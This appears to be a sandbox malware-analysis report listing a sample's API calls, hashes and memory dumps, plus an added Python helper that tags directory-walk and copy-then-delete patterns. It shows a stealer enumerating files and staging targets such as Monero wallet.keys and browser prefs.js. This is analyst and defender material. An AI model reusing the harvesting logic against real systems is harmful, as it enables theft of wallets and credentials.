                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: ba8eac3003882ea7bee6b2b959edd300807ecc1dbd8ce06c73f617e1db26b292
                                      • Instruction ID: 32ce791bb34420fca927e32ad1992a1c471dfb3afffa191fecc67fa8a0c95198
                                      • Opcode Fuzzy Hash: ba8eac3003882ea7bee6b2b959edd300807ecc1dbd8ce06c73f617e1db26b292
                                      • Instruction Fuzzy Hash: 20E118719111289BDB65FB60DDA2EEE733DAF64300F8045E9B50A62092EF306F99CF51
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001315A8,00130BAF), ref: 0011DBEB
                                      • StrCmpCA.SHLWAPI(?,001315AC), ref: 0011DC33
                                      • StrCmpCA.SHLWAPI(?,001315B0), ref: 0011DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011DECC
                                      • FindClose.KERNEL32(000000FF), ref: 0011DEDE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: `
                                      • API String ID: 3334442632-4168407445
                                      • Opcode ID: 92a468fff563d1c11bdb5841d1a8c0b3560827091013acb6723a900f84d49a13
                                      • Instruction ID: e7772ca5e9da845b0956adfa8259a9c71c287f09989adaea0523826801cdebe7
                                      • Opcode Fuzzy Hash: 92a468fff563d1c11bdb5841d1a8c0b3560827091013acb6723a900f84d49a13
                                      • Instruction Fuzzy Hash: 6A91F572A001149BCB18FB74FD969ED737DAFA4340F404A68F90656181FF34AB58CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 14c0675e41154c0678171b1c5052b557cdebcb1ad6644fb204c024f0b37c4f20
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: 92E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001316B0,00130D97), ref: 0011F81E
                                      • StrCmpCA.SHLWAPI(?,001316B4), ref: 0011F86F
                                      • StrCmpCA.SHLWAPI(?,001316B8), ref: 0011F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 0011FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 874e6bbc8448fddbbba08cbeed594d11e82c28981d73a589d697d631b56363d3
                                      • Instruction ID: c5283280c26454942b24af00ce53427abefa2af398297d913f1c4ee7884bcd29
                                      • Opcode Fuzzy Hash: 874e6bbc8448fddbbba08cbeed594d11e82c28981d73a589d697d631b56363d3
                                      • Instruction Fuzzy Hash: 65B116719001289BCB28FF64ED96FED7379AF64300F4085A8E50A57191EF306B59CF92
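Several entries on this page share one shape: a FindFirstFileA / FindNextFileA / FindClose loop with two StrCmpCA calls against string addresses four bytes apart, path building through wsprintfA or lstrcpy/lstrcat subcalls with format strings such as %s\%s and %s\*.*, and in one routine a CopyFileA followed by DeleteFileA. Literal targets (\Monero\wallet.keys, prefs.js) surface only as subcall arguments. The following is an added triage helper, written for this page and not part of Joe Sandbox or the sample, that parses APIs blocks in exactly the line format shown here and tags those patterns per function. The function and tag names (parse_api_block, profile, directory-walk, skips-two-names, copy-then-delete, path-building) are mine, and the reading of two adjacent StrCmpCA calls as the "." and ".." skip is an inference from the pattern, since the report resolves neither string.

```python
"""Triage helper for the "APIs" blocks of a Joe Sandbox IDA-plugin listing (added example)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One "• api.MODULE(args), ref: ADDR" line. "Part of subcall function X:" marks a call made
# by a callee rather than by the function itself. The argument list may be absent (wsprintfA
# lines have none) and may carry string literals the plugin resolved.
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Arguments the plugin could not resolve ("?") or left as raw 8-hex-digit values.
_UNRESOLVED = re.compile(r"^(?:[0-9A-Fa-f]{8}|\?)$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # address of the callee making this call, None if direct


def parse_api_block(text: str) -> List[Call]:
    """Parse one APIs block; header lines and anything else that does not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls


def profile(text: str) -> dict:
    """Summarise one function's API usage and tag the enumeration / staging patterns."""
    calls = parse_api_block(text)
    direct = {c.api for c in calls if c.subcall is None}
    every = {c.api for c in calls}
    name_compares = sum(1 for c in calls if c.subcall is None and c.api.startswith("StrCmpC"))
    literals = sorted({a for c in calls for a in c.args if a and not _UNRESOLVED.match(a)})

    tags = []
    if (any(a.startswith("FindFirstFile") for a in direct)
            and any(a.startswith("FindNextFile") for a in direct)
            and "FindClose" in direct):
        tags.append("directory-walk")
        if name_compares >= 2:
            # Two name comparisons inside a Find* loop is what a "." / ".." skip looks like;
            # the report shows only two string addresses, so this is an inference (assumption).
            tags.append("skips-two-names")
    if any(a.startswith("CopyFile") for a in direct) and any(a.startswith("DeleteFile") for a in direct):
        tags.append("copy-then-delete")
    if every & {"lstrcpy", "lstrcat", "lstrlen", "wsprintfA", "wsprintfW"}:
        tags.append("path-building")
    return {
        "direct_apis": sorted(direct),
        "subcall_apis": sorted(every - direct),
        "literals": literals,
        "tags": tags,
        "api_counts": dict(Counter(c.api for c in calls)),
    }


# Constructed input: two APIs blocks copied from this report, the wsprintfA walker at
# 0011EE3E and the CopyFileA/DeleteFileA routine at 00111963 (subcall lines abridged).
SAMPLE_WALK_ENTRY = r"""
APIs
• wsprintfA.USER32 ref: 0011EE3E
• FindFirstFileA.KERNEL32(?,?), ref: 0011EE55
• StrCmpCA.SHLWAPI(?,00131630), ref: 0011EEAB
• StrCmpCA.SHLWAPI(?,00131634), ref: 0011EEC1
• FindNextFileA.KERNEL32(000000FF,?), ref: 0011F3AE
• FindClose.KERNEL32(000000FF), ref: 0011F3C3
"""

SAMPLE_COPY_ENTRY = r"""
APIs
  • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0013523C,?,?,?,001352E4,?,?,00000000,?,00000000), ref: 00111963
• StrCmpCA.SHLWAPI(?,0013538C), ref: 001119B3
• StrCmpCA.SHLWAPI(?,00135434), ref: 001119C9
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00111D80
• DeleteFileA.KERNEL32(00000000), ref: 00111E0A
• FindNextFileA.KERNEL32(000000FF,?), ref: 00111E60
• FindClose.KERNEL32(000000FF), ref: 00111E72
  • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
  • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
"""

if __name__ == "__main__":
    for name, block in (("walker", SAMPLE_WALK_ENTRY), ("copier", SAMPLE_COPY_ENTRY)):
        p = profile(block)
        print(name, p["tags"], p["literals"])
```

Run over every APIs block of a report, the tags separate plain enumeration helpers from the routine that stages matched files, and the literals list collects the file names the grabber is after even when they only appear deep in a subcall.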
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Cr$B_?$PLtZ$\rm?$]5Hx$hI]n$od;$sd;$v_$~jnm$,f
                                      • API String ID: 0-1983312684
                                      • Opcode ID: b7f7dca629319acab6db810f9ea781730ba5474d50a4655268412a921331978b
                                      • Instruction ID: ce98ccef12404b2775ad885fd8863a03edc38b100c28e0d25611dbe271900671
                                      • Opcode Fuzzy Hash: b7f7dca629319acab6db810f9ea781730ba5474d50a4655268412a921331978b
                                      • Instruction Fuzzy Hash: A9B2E6F3A0C2109FE304AE2DEC8577ABBE9EB94760F16493DEAC5D3744E63558008697
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0013523C,?,?,?,001352E4,?,?,00000000,?,00000000), ref: 00111963
                                      • StrCmpCA.SHLWAPI(?,0013538C), ref: 001119B3
                                      • StrCmpCA.SHLWAPI(?,00135434), ref: 001119C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00111D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00111E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00111E60
                                      • FindClose.KERNEL32(000000FF), ref: 00111E72
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 171706d1843a3e7a1d7de17952ae011a9bdd13b7212654013c02f8d6b9c42512
                                      • Instruction ID: 972b59af105c30a6036359a49d17de999386bb0c403f29db2df4f1919444522e
                                      • Opcode Fuzzy Hash: 171706d1843a3e7a1d7de17952ae011a9bdd13b7212654013c02f8d6b9c42512
                                      • Instruction Fuzzy Hash: 5412D671910128ABCB19FB60EDA6EEE737DAF64300F8045E9B50666091EF706F98CF51
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00130C32), ref: 0011DF5E
                                      • StrCmpCA.SHLWAPI(?,001315C0), ref: 0011DFAE
                                      • StrCmpCA.SHLWAPI(?,001315C4), ref: 0011DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 0011E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 8db3cf78f74f48ccaf6d2f21d07f8ed89ee720a070f69de523d159013ea5f0c7
                                      • Instruction ID: d93aae7a1dc65cd8a894f73004b16548df6456eff004aed9195513b9edee8e10
                                      • Opcode Fuzzy Hash: 8db3cf78f74f48ccaf6d2f21d07f8ed89ee720a070f69de523d159013ea5f0c7
                                      • Instruction Fuzzy Hash: A5F19E719141289BCB29FB60EDA6EEE7379BF64300F8045D9B50A62091EF306F99CF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: *i{$5Z&?$>??D$>Lo/$N]?$Y"O[$ZV/{$dh~u$dty$Hu]
                                      • API String ID: 0-4141971620
                                      • Opcode ID: f33e78b3df5c547288e2eaf1263f157497492161db533300f4831c3027ffceb3
                                      • Instruction ID: bbd0b29bb34cdfb5e5b7167cb58cd9a348fb86c11feeb63bff83a4b4ad6e2ded
                                      • Opcode Fuzzy Hash: f33e78b3df5c547288e2eaf1263f157497492161db533300f4831c3027ffceb3
                                      • Instruction Fuzzy Hash: DBB235F3A082149FD3046E2DEC8567ABBE9EF94720F1A4A3DEAC4C7744E63558018797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: &c/;$(nw$:~$Oan>$XFe_$cKI($l~$~Y/$~v8
                                      • API String ID: 0-1850426519
                                      • Opcode ID: 01b9697c0fb4f8ae223b9d1099b8e4d84c7a22a33c2d8da8a38ba1bed6214193
                                      • Instruction ID: cce40f560d7955b5b54cb06ac8743c5a3a83aa6cc39f355c3396f7cb861ad898
                                      • Opcode Fuzzy Hash: 01b9697c0fb4f8ae223b9d1099b8e4d84c7a22a33c2d8da8a38ba1bed6214193
                                      • Instruction Fuzzy Hash: 62B2F3F3A0C2049FD3046F29DC8567AFBE9EF94720F16892DEAC487744EA3558058B97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
